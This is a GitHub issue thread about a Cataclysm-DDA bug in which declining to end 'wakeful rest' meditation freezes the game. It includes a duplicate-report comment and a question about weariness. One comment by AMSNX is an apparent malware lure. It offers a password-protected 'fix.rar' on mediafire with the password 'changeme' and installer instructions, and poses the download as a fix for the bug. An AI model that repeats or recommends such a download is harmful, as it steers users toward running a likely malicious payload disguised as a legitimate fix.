### ISSUE TITLE
[MOM] Wakeful rest spell causes softlock if you try to continue meditating after fully rested.

### ISSUE THREAD

**Issue by Aimless-dude** [CleverRaven/Cataclysm-DDA#75984]
### Describe the bug

Does what it says on the tin. When using wakeful rest, you get a popup saying 'you are fully refreshed, and can end your meditations now' and gives you a selection screen. Selecting Yes stops the meditation. Selecting no freezes the game.

### Attach save file

N/A- trivally recreatable

### Steps to reproduce

1) be tired. Cast wakeful rest (a vitakinetic skill)
2) Wait till you're rested from it
3) hit 'no' on the popup.

### Expected behavior

I expect to be able to rest further, for healing, and reducing my weariness.

### Screenshots

![image](https://github.com/user-attachments/assets/cf25c0fc-15ab-48a2-8341-543989a301ca)

### Versions and configuration

- OS: Windows
    - OS Version: 10.0.19045.4780 (22H2)
- Game Version: 2db2a2e [64-bit]
- Graphics Version: Tiles
- Game Language: System language []
- Mods loaded: [
    Dark Days Ahead [dda],
    Disable NPC Needs [no_npc_food],
    Portal Storms Ignore NPCs [personal_portal_storms],
    Slowdown Fungal Growth [no_fungal_growth],
    Bombastic Perks [bombastic_perks],
    Mind Over Matter [mindovermatter],
    Stats Through Kills [stats_through_kills],
    Tamable Wildlife [Tamable_Wildlife],
    Sky Island [skyisland]
]

### Additional context

Because the game locks after doing it, this save file is slightly before I used it.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Standing-Storm** [comment]
Reported before but never confirmed: #69780

**Comment by Cupidatis** [comment]
>I expect to be able to rest further, for healing, and reducing my weariness.
Is this power helps with weariness? Didn't found it in effects...
